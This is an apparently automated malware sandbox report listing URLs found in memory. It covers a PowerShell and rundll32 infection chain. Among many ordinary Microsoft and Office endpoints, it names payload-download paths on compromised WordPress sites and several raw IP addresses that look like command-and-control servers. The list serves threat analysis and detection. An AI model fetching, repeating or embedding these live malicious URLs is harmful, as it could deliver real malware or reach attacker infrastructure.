              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/9aTcv/.Split.Split
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/In
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Tcv/.Splitplit0.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngp
              Source: powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.co
              Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com
              Source: powershell.exe, 00000005.00000002.343856415.0000000004E23000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-conte
              Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5
              Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmpString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5U
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
              Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
              Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmpString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCK
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
              Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14/563209-4053062332-1002
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14/W
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14/h
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://168.197.250.1480/
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://168.197.250.14:80/
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://168.197.250.14:80/y
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48/
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://45.79.33.48/a
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48/s
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/0
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/2
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://45.79.33.48:8080/a
              Source: rundll32.exe, 00000015.00000002.535047185.0000000002FF0000.00000004.00000020.sdmpString found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVo
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoU
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoryptography
              Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpString found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVou/
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/
              Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/E
              Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN
              Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3
              Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa
              Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh
              Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.aadrm.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.aadrm.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.cortana.ai
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.office.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.onedrive.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://augloop.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cdn.entity.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://clients.config.office.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://config.edge.skype.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cortana.ai
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cortana.ai/api
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://cr.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dev.cortana.ai
              Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://devnull.onenote.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://directory.services.
              Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterp
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: powershell.exe, 00000005.00000003.312830879.000000000517B000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://graph.windows.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://graph.windows.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://lifecycle.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://login.windows.local
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://management.azure.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://management.azure.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://messaging.office.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ncus.contentsync.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://officeapps.live.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
